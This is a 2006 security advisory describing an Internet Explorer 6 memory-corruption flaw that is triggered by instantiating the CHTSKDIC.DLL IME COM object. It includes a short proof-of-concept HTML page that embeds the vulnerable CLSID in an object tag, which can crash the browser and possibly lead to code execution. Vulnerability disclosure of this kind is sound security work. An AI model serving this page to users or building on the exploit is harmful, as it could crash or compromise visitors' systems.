Advisory ID: XSec-06-03 Advisory Name: Internet Explorer (CHTSKDIC.DLL) COM Object Instantiation Vulnerability Release Date: 08/15/2006 Tested on: Internet Explorer 6.0 SP1 on Microsoft Windows XP SP2 CN Affected version: Internet Explorer 6.0 Author: nop <nop#xsec.org> http://www.xsec.org Overview: A vulnerability has been found in Internet Explorer 6.0. \ When Internet Explorer tries to instantiate the CHTSKDIC.DLL \ (Microsoft IME) COM object as an ActiveX control, it may corrupt \ system memory in such a way that an attacker may DoS and possibly \ could execute arbitrary code. Exploit: =============== CHTSKDIC.DLL.htm start ================ <!-- // Internet Explorer (CHTSKDIC.DLL) COM Object Instantiation Vulnerability // tested XP SP2 CN // http://www.xsec.org // nop (nop#xsec.org) // CLSID: {BE4191FB-59EF-4825-AEFC-109727951E42} // Info: ImeSingleKanjiDict// ProgID: ID2 // InprocServer32: C:\WINDOWS\IME\CHTIME\APPLETS\CHTSKDIC.DLL !--> <html><body> <object classid="CLSID:{BE4191FB-59EF-4825-AEFC-109727951E42}" ></object> </body></html> =============== CHTSKDIC.DLL.htm end ================== Link: http://www.xsec.org/index.php?module=releases&act=view&type=1&id=9 About XSec: We are redhat.